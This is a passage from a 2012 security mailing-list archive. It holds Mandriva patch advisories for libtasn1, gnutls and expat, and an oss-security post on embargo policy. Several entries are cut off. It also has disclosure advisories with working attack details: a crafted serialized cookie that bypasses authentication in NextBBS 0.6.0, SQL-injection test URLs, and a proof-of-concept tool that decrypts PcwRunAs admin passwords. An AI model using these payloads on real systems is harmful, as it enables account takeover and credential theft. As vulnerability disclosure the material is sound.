2011/x86_64/libtasn1-tools-2.9-2.1-mdv2011.0.x86_64.rpm d73a4e5fcfc4abb57dc3d309ed4d999e 2011/SRPMS/libtasn1-2.9-2.1.src.rpm Mandriva Enterprise Server 5: a07a6c2ed4e75e72c440c5ce64315b48 mes5/i586/libtasn1_3-1.5-2.1mdvmes5.2.i586.rpm d6b7a20bd3c91808f02ea25740b5d904 mes5/i586/libtasn1-devel-1.5-2.1mdvmes5.2.i586.rpm 33e56c2b94ba3e3ca2736f63d7338966 mes5/i586/libtasn1-tools-1.5-2.1mdvmes5.2.i586.rpm ee39b9f35767b2781999cbe1d32cddb4 mes5/SRPMS/libtasn1-1.5-2.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 3ae9ddcc16a911f1a9a056075e34f5e2 mes5/x86_64/lib64tasn1_3-1.5-2.1mdvmes5.2.x86_64.rpm ad2a1e9b3ed5f7a2be0e20b7565068f7 mes5/x86_64/lib64tasn1-devel-1.5-2.1mdvmes5.2.x86_64.rpm 29c794bb8047041d930d1e049b3b22d0 mes5/x86_64/libtasn1-tools-1.5-2.1mdvmes5.2.x86_64.rpm ee39b9f35767b2781999cbe1d32cddb4 mes5/SRPMS/libtasn1-1.5-2.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPcWttmqjQ0CJFipgRAk0KAJ9iHFpXZPn8+Y7LgMmBOv+QL7WwFACgsXvr ey6d0f6pwR+cgJ4U/tyWTmY= =xWwi -END PGP SIGNATURE-
[waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
[waraxe-2012-SA#080] - Multiple Vulnerabilities in NextBBS 0.6.0
===
Author: Janek Vind waraxe
Date: 27. March 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-80.html
Description of vulnerable software:
~~~
nextBBS lets you create your own Community with unrivaled ease of use.
Even though the software is highly performant, it doesn't lack any feature
that makes big boards attractive. In fact, it offers the most Web 2.0
experience currently available.
http://sourceforge.net/projects/forums/
Vulnerable versions
~~~
Affected is NextBBS version 0.6.0, older versions may be vulnerable
as well.
###
1. Authentication Bypass in user.php
###
Reason: using unsanitized user submitted data
Attack vector: user submitted cookie
Preconditions: none
Result: attacker can impersonate any user, including admins
Source code snippet from vulnerable script user.php:
-[ source code start ]-
// Cookie?
if(isset($_COOKIE[$CONFIG-sessions-name]) ||
isset($_SESSION[$CONFIG-sessions-name]))
{
..
if(isset($_COOKIE[$CONFIG-sessions-name]))
{
$scookie = $_COOKIE[$CONFIG-sessions-name];
..
$cookie = unserialize(stripslashes($scookie));
..
$checkagainst = $this-generatePrivateKey($row['password']);
if($checkagainst == $cookie['userkey'])
{
$_SESSION['ID'] = $uid;
$this-setMember($_SESSION['ID']);
-[ source code end ]---
As seen above, user submitted cookie will be unserialized and resulting
data is used for authentication. No input data validation exists.
Attacker can use specially crafted cookie, so that after unserializing
variable $cookie['userkey'] will be boolean true.
Comparing as if($checkagainst == $cookie['userkey']) is insecure and will
always return true, if $cookie['userkey'] is boolean true.
This will allow complete authentication bypass.
Test:
Array after serialization:
a:3:{s:3:uid;s:4:1219;s:7:checker;s:1:1;s:7:userkey;b:1;}
After urlencoding:
a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D
Cookie:
nextBBS=a%3A3%3A%7Bs%3A3%3A%22uid%22%3Bs%3A4%3A%221219%22%3Bs%3A7%3A%22checker%22%3Bs%3A1%3A%221%22%3Bs%3A7%3A%22userkey%22%3Bb%3A1%3B%7D;
Now we will use Firefox with Tamper Data extension for easy cookie
manipulation.
Let's open page in unauthenticated state and with crafted cookie:
http://localhost/nextbbs.0.6.0/
Result: Welcome back, waraxe. (Log out?) (Admin CP)
We have admin level access now, as expected.
###
2. SQL Injection in ajaxserver.php function findUsers
###
Reason: using unsanitized user submitted data in SQL queries
Attack vector: user submitted GET parameter curstr
Preconditions: none
Result: attacker can manipulate database queries
Source code snippet from vulnerable script ajaxserver.php:
-[ source code start ]-
function findUsers($method)
{
global $INPUT, $CONFIG, $DB;
$filter = urldecode($INPUT['curstr']);
$retstr = '';
$qry = SELECT userid FROM {$CONFIG-dbprfx}users
WHERE server='{$CONFIG-server}' AND userid like
'.$filter.%';
$res = $DB-query($qry);
-[ source code end ]---
As seen above, user submitted GET parameter curstr is urldecoded and
afterwards used in SQL query without proper sanitization. By using urlencoded
single quotes it is possible to conduct SQL injection atttacks.
Test:
http://localhost/nextbbs.0.6.0/?do=ajaxserveraction=finduserscurstr=war%2527axe
Result:
SQL Layer Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use
near 'axe%'' at line 1
Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%']
###
3. SQL Injection in ajaxserver.php function isIdAvailable
###
Reason: using unsanitized user submitted data in SQL queries
Attack vector: user submitted GET parameter id
Preconditions: none
Result: attacker can manipulate database queries
Source code snippet from vulnerable script
PcwRunAs Password Obfuscation Design Flaw
# Vuln Title: PcwRunAs Password Obfuscation Design Flaw # Date: 26.03.2012 # Author: Christian Landström, otr # Software Link: http://www.pcwelt.de/downloads/pcwRunAs-1215998.html # Version: = 0.4 # Tested on: Windows # CVE : CVE-2012-1793 # Risk: high # Type: Privilege Escalation # Vendor: PC-Welt Timeline: 2012-03-19 Vendor contacted 2012-03-19 Vendor response 2012-03-19 CVE number requested 2012-03-20 CVE number assigned 2012-03-26 Public disclosure Summary: The PcwRunAs software available from the PC-Welt website is prone to a trivial password recovery attack that allows local users to obtain passwords encrypted with the pcwRunAsGui.exe. Context: PcwRunAs is a substitute for the RunAs tool included in the Windows operating system. The tool allows to run commands in a different user context. Usually this is used to execute commands that only higher privileged users are allowed to run (like administrative or maintenance tasks). Included in the PcwRunAs package is a tool called pcwRunAsGui which features the creation of batch scripts that contain an encrypted version of the command line arguments. This is used to hide the password information from ordinary users that have access to the batch script but should not know the administrator password. Currently two versions of the tool are used in the wild. These are versions 0.3 and 0.4. Design Flaw: Both the PcwRunAsGui and the PcwRunAs tool share a common encryption key. By design it is impossible to have PcwRunAs decrypt the string produced by PcwRunAsGui and not give an attacker that wants to decrypt the cipher text access to it. Hence the encryption key is embedded in the binaries of both tools. This allows an attacker to reverse engineer the static encryption key from the available binaries. The encryption key is derived from a RIPEDM-160 hash (160bits) that serves as initialization for the blowfish encryption algorithm. This RIPEDM-160 hash is static for each version of the pcwrunas tool as it is simply a hash sum of the pcwRunAs.exe executable file. The plain text command line arguments get Blowfish-EBC encrypted with the static RIPEDM-160 hash and the result encoded in base64, e.g. in version 0.3: /u admin /p test1234 /app C:\WINNT\NOTEPAD.EXE Becomes, encrypted with blowfish and base64 encoded: pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY= As the string is blowfish EBC(!) encrypted it is possible to brute force a given base64 string by hand, systematically trying different inputs for the pcwrunasgui tool and trying to reproduce the encrypted string one once to decipher. By reverse engineering the binaries it is possible to extract the static RIPEDM-160 hash that is used for encryption and write a tool that takes the encrypted base64 string and decrypts it using the static RIPEDM-160 hash (different in version 0.3 and 0.4). The version 0.4 features a protection mechanism that salts the encryption key with the hard disk serial number. However this feature is not widely used by enterprises as administrative batch scripts are usually rolled out to many workstations. This would mean that a new script would have to be created on each workstation. In any case an attacker knowing the serial number is again able to decrypt the cipher text by RIPEDM-160 hashing the number and the key and using it as blowfish initialization. Fix: There is no trivial fix for this problem as this is a flaw by design. As companies and individuals trust the pcwrunas tool for securing their administrator password, we suggest that an advisory be made public in order to inform administrators of the problem. POC: ./decrypt_pcwrunas Tool to decrypt blowfish-ebc from the PcwRunAs tool Author: otr --- Usage: decrypt_pcwrunas [version] [base64encryptedblowfish] Example: decrypt_pcwrunas v0.3 pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY= Example: decrypt_pcwrunas v0.4 EaVnXUyaAbve9Ef4K3QCm2dCzyH9znKcrZBwjaTLCgOT2sWBtCy38DEVTr5S root@bt ~/Desktop/runwasdec # ./decrypt_pcwrunas v0.4 EaVnXUyaAbve9Ef4K3QCm2dCzyH9znKcrZBwjaTLCgOT2sWBtCy38DEVTr5S [+] Decrypted: /u aaa /p /app a /arg aa root@bt ~/Desktop/runwasdec # ./decrypt_pcwrunas v0.3 pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY= [+] Decrypted: /u admin /p test1234 /app C:\WINNT\NOTEPAD.EXE
[ MDVSA-2012:040 ] gnutls
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:040 http://www.mandriva.com/security/ ___ Package : gnutls Date: March 27, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in GnuTLS: gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before 3.0.15 does not properly handle data encrypted with a block cipher, which allows remote attackers to cause a denial of service (heap memory corruption and application crash) via a crafted record, as demonstrated by a crafted GenericBlockCipher structure (CVE-2012-1573). The updated packages have been patched to correct this issue. The GnuTLS packages for Mandriva Linux 2011 has been upgraded to the 2.12.8 version due to problems with the test suite while building it, additionally a new dependency was added on p11-kit for the PKCS #11 support. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573 ___ Updated Packages: Mandriva Linux 2010.1: 84fe977c92439bb32df611df1650ab49 2010.1/i586/gnutls-2.8.6-1.1mdv2010.2.i586.rpm 6b78490b7f1a28eae56a60232b3a47e1 2010.1/i586/libgnutls26-2.8.6-1.1mdv2010.2.i586.rpm ee03994b5cc11b7b9adf5bda20cd0403 2010.1/i586/libgnutls-devel-2.8.6-1.1mdv2010.2.i586.rpm 0b061fd63c828078eda7be92cae9b092 2010.1/SRPMS/gnutls-2.8.6-1.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: d1e4439701a878ec8306618e0d6ede38 2010.1/x86_64/gnutls-2.8.6-1.1mdv2010.2.x86_64.rpm 064d9d0821205f57a0b3730706a16d49 2010.1/x86_64/lib64gnutls26-2.8.6-1.1mdv2010.2.x86_64.rpm daad08c89bca56d320d5640bf9d0f9cc 2010.1/x86_64/lib64gnutls-devel-2.8.6-1.1mdv2010.2.x86_64.rpm 0b061fd63c828078eda7be92cae9b092 2010.1/SRPMS/gnutls-2.8.6-1.1mdv2010.2.src.rpm Mandriva Linux 2011: 03b54e6a480014cd50351bd6d9137eee 2011/i586/gnutls-2.12.8-0.1-mdv2011.0.i586.rpm 4f8324ae69858ac5314c092c7ce8d28c 2011/i586/libgnutls26-2.12.8-0.1-mdv2011.0.i586.rpm 83781fcdcf3bf49326a08a56d3415dd6 2011/i586/libgnutls-devel-2.12.8-0.1-mdv2011.0.i586.rpm ae4c1da80e0dfe6f31fdcb3aae66c6f9 2011/i586/libgnutls-ssl27-2.12.8-0.1-mdv2011.0.i586.rpm 2d48b8165570ce883339b2b7c5ec8f28 2011/i586/libp11-kit0-0.12-0.1-mdv2011.0.i586.rpm 27dc6ef56ac53253aaf6c8dc7ec14be0 2011/i586/libp11-kit-devel-0.12-0.1-mdv2011.0.i586.rpm a3fda32412f18ed9f5ea05e2e85239b6 2011/i586/p11-kit-0.12-0.1-mdv2011.0.i586.rpm 34e3627bee3943ee7e820335bcf282d7 2011/SRPMS/gnutls-2.12.8-0.1.src.rpm 3a3cb1d7ac07a898c96f23fdf4a9ee88 2011/SRPMS/p11-kit-0.12-0.1.src.rpm Mandriva Linux 2011/X86_64: bdf863bf5526d5f0090adad36a97d2a0 2011/x86_64/gnutls-2.12.8-0.1-mdv2011.0.x86_64.rpm 15ac3c1ddccaefda397ca1072800f17e 2011/x86_64/lib64gnutls26-2.12.8-0.1-mdv2011.0.x86_64.rpm c54cc6064fd650d71919dd30ea8432dc 2011/x86_64/lib64gnutls-devel-2.12.8-0.1-mdv2011.0.x86_64.rpm 97f4482bf6bf93e7736a93d65295d395 2011/x86_64/lib64gnutls-ssl27-2.12.8-0.1-mdv2011.0.x86_64.rpm 5c949c0312b843a1d78a5cbc3095d399 2011/x86_64/lib64p11-kit0-0.12-0.1-mdv2011.0.x86_64.rpm 6a9a1c14363e3f189673bd84a5d86569 2011/x86_64/lib64p11-kit-devel-0.12-0.1-mdv2011.0.x86_64.rpm 4c08d462b22406716bc8d09227aea95a 2011/x86_64/p11-kit-0.12-0.1-mdv2011.0.x86_64.rpm 34e3627bee3943ee7e820335bcf282d7 2011/SRPMS/gnutls-2.12.8-0.1.src.rpm 3a3cb1d7ac07a898c96f23fdf4a9ee88 2011/SRPMS/p11-kit-0.12-0.1.src.rpm Mandriva Enterprise Server 5: e89da64c243b655f2c885a7aa9bd1ab7 mes5/i586/gnutls-2.4.1-2.6mdvmes5.2.i586.rpm 93fbfd78b1c5a3ebd016129a2124eb33 mes5/i586/libgnutls26-2.4.1-2.6mdvmes5.2.i586.rpm bc3b6854064c8d10d25fb142ed4b8126 mes5/i586/libgnutls-devel-2.4.1-2.6mdvmes5.2.i586.rpm 3e9a2e29bf76124c38953fac49178d7b mes5/SRPMS/gnutls-2.4.1-2.6mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: e187d4d4342739829294f478c49b15d3 mes5/x86_64/gnutls-2.4.1-2.6mdvmes5.2.x86_64.rpm 6be44fc1ddded6f912242f6a24941a9b mes5/x86_64/lib64gnutls26-2.4.1-2.6mdvmes5.2.x86_64.rpm 3ca285b39caa7cd055ff5ea968599005 mes5/x86_64/lib64gnutls-devel-2.4.1-2.6mdvmes5.2.x86_64.rpm 3e9a2e29bf76124c38953fac49178d7b mes5/SRPMS/gnutls-2.4.1-2.6mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update
Re: CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
Hi, As stated in the timeline below (thanks!), this issue was handled in part using the Openwall-hosted distros list (which currently notifies many Linux distro vendors, FreeBSD, and NetBSD/pkgsrc with PGP re-encryption to individual recipients): http://oss-security.openwall.org/wiki/mailing-lists/distros The primary reason why I feel I have to post this follow-up message is that the long embargo period here was a major violation of the list's policy. It is the second major violation so far; the first one was for HashDoS, and it was similarly discussed on oss-security after the fact: http://www.openwall.com/lists/oss-security/2011/12/29/4 http://www.openwall.com/lists/oss-security/2011/12/29/7 It's cases like this that may eventually make us reconsider and stop hosting the non-public lists. (Some propose automatic publishing of messages after N days as an alternative.) Luckily, so far violations like this have been relatively rare, and one of the reasons why I feel every one of them needs attention is to keep it so. I've included more detail below: On Sat, Mar 24, 2012 at 09:40:42AM -0700, VSR Advisories wrote: 2012-01-09OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor maintainers were provided a draft advisory and test sample. The OpenWall distros mailing list was also notified. Apache OpenOffice Security team acknowledged notification. libraptor developer confirmed flaw. 2012-01-10CVE-2012-0037 assigned by Apache. 2012-02-02Notified OpenWall distros mailing list again, due to previous technical problems. IIRC, the technical problems being referred to here were an attachment not being re-encrypted to list members, so they only had partial info until this point - essentially just the fact that there's a vulnerability in those products, but with no detail; given the extra embargo time (not needed by distro vendors) this may actually be good. The list setup is a bit picky about what encrypted message formats it supports (besides plaintext, they may be PGP/MIME or PGP inline, but they can't have individual pre-encrypted attachments - this has since been clarified on the wiki). 2012-02-04libraptor developer provided patches to all notified parties. 2012-02-22Extensive arguing between vendors about embargo/release date. 2012-03-06More arguing about release date. 2012-03-14Agreed upon release date established. 2012-03-22Security updates and vendor advisories released. 2012-03-24VSR advisory released. At the time of the initial notification in January, the distros list policy was to allow a maximum embargo period of 14 days (and this was stated on the wiki page with the list posting address). At the time of the second notification in February, the policy was stated as: Please note that the maximum acceptable embargo period for issues disclosed to these lists is 14 to 19 days, with embargoes longer than 14 days (up to 19) allowed in case the issue is reported on a Thursday or a Friday and the proposed coordinated disclosure date is thus adjusted to fall on a Monday or a Tuesday. Please do not ask for a longer embargo. In fact, embargo periods shorter than 7 days are preferable. When it became apparent that this was to be violated since one or two of the affected upstreams wanted much more time, the reporter (Timothy D. Morgan of VSR Security) explained that at the time of his initial notification he had thought that 14 days would in fact be enough. While this sounds like a rather fundamental problem with a maximum embargo time policy (it is always possible that something new is discovered during discussion, which may invalidate the initial time estimate of the reporter), I've just added the following verbiage to hopefully reduce the number of such occurrences going forward: If you have not yet notified upstream projects/developers of the affected software, other affected distro vendors, and/or affected Open Source projects, you may want to do so before notifying one of these mailing lists in order to ensure that these other parties are OK with the maximum embargo period that would apply (and if not, then you may have to delay your notification to the mailing list), unless you're confident you'd choose to ignore their preference anyway and disclose the issue publicly soon as per the policy stated here. Of course, I fully expect this attempt to sometimes fail, but maybe - just maybe - it will help in some cases. There's no perfect solution here (although some would reasonably argue that simply not doing any pre-disclosure coordination is perfect - in a way it is). The time required by the free office product vendors to issue a security fix here reminded me of web browsers in 1990s. Several web browser vendors have since learned to issue security fixes much quicker, but apparently office vendors still lack processes to do so. Besides, the timing of the
[ MDVSA-2012:041 ] expat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:041 http://www.mandriva.com/security/ ___ Package : expat Date: March 27, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 ___ Problem Description: A memory leak and a hash table collision flaw in expat could cause denial os service (DoS) attacks (CVE-2012-0876, CVE-2012-1148). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0876 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1148 ___ Updated Packages: Mandriva Linux 2010.1: 210b60280a0baf8e08634e0ea6a3bab9 2010.1/i586/expat-2.0.1-12.1mdv2010.2.i586.rpm 0b657867100b109cbf90a05d2262bec7 2010.1/i586/libexpat1-2.0.1-12.1mdv2010.2.i586.rpm 0bd180a7b4f4d93df5b74f66e2c85e74 2010.1/i586/libexpat1-devel-2.0.1-12.1mdv2010.2.i586.rpm 9f063d0589f638e047de6a5266e6ac84 2010.1/SRPMS/expat-2.0.1-12.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: ced30873d989d1511e828037b4f68d4d 2010.1/x86_64/expat-2.0.1-12.1mdv2010.2.x86_64.rpm ebd7d687082377e65c818f8ba780b66d 2010.1/x86_64/lib64expat1-2.0.1-12.1mdv2010.2.x86_64.rpm fd8bef44ccdadeaf14966b44733883fe 2010.1/x86_64/lib64expat1-devel-2.0.1-12.1mdv2010.2.x86_64.rpm 9f063d0589f638e047de6a5266e6ac84 2010.1/SRPMS/expat-2.0.1-12.1mdv2010.2.src.rpm Mandriva Linux 2011: 6c8bdc44eed2cebf483d4041d57f5eea 2011/i586/expat-2.0.1-15.1-mdv2011.0.i586.rpm 8211eeb028a563dcbedda7d1726035bb 2011/i586/libexpat1-2.0.1-15.1-mdv2011.0.i586.rpm c6c9685891ae405ff6181b6899ee10ce 2011/i586/libexpat-devel-2.0.1-15.1-mdv2011.0.i586.rpm 7afd883dae4a17201128de1485cf949c 2011/i586/libexpat-static-devel-2.0.1-15.1-mdv2011.0.i586.rpm 4be73538c443ced014373c7e364daac5 2011/SRPMS/expat-2.0.1-15.1.src.rpm Mandriva Linux 2011/X86_64: 7e84ec2183f6ba903779b00f914e3813 2011/x86_64/expat-2.0.1-15.1-mdv2011.0.x86_64.rpm d7c0853983ce8d2dc2b0b9740924acd7 2011/x86_64/lib64expat1-2.0.1-15.1-mdv2011.0.x86_64.rpm ecca4f586885b53d2a0ca39a8985f561 2011/x86_64/lib64expat-devel-2.0.1-15.1-mdv2011.0.x86_64.rpm f87f9aecd51f1f20508dc6f6ad5f02e6 2011/x86_64/lib64expat-static-devel-2.0.1-15.1-mdv2011.0.x86_64.rpm 4be73538c443ced014373c7e364daac5 2011/SRPMS/expat-2.0.1-15.1.src.rpm Mandriva Enterprise Server 5: 9618c2dceec06fcb04655e2adb9f8d9d mes5/i586/expat-2.0.1-7.4mdvmes5.2.i586.rpm a0b4d2e3b545f6d63cef9476da3cc72f mes5/i586/libexpat1-2.0.1-7.4mdvmes5.2.i586.rpm 95ec804d1758d0a7628abd42bf3e54e5 mes5/i586/libexpat1-devel-2.0.1-7.4mdvmes5.2.i586.rpm 01271afe453d63599a6951f7dbc83197 mes5/SRPMS/expat-2.0.1-7.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 4781b62e289cae964e8a7c540d2387c9 mes5/x86_64/expat-2.0.1-7.4mdvmes5.2.x86_64.rpm aee65480dd6cc31f957c3b17771babf6 mes5/x86_64/lib64expat1-2.0.1-7.4mdvmes5.2.x86_64.rpm ddbc81b65a6969e17900bbbc842cc8e4 mes5/x86_64/lib64expat1-devel-2.0.1-7.4mdvmes5.2.x86_64.rpm 01271afe453d63599a6951f7dbc83197 mes5/SRPMS/expat-2.0.1-7.4mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFPcd5UmqjQ0CJFipgRAvzjAJ46WPQm7hmP1/gmoLmPmFMdZYcOrQCgq/oR ZVAk5KD7zUd2cFhkef3xvRo= =EuSi -END PGP SIGNATURE-
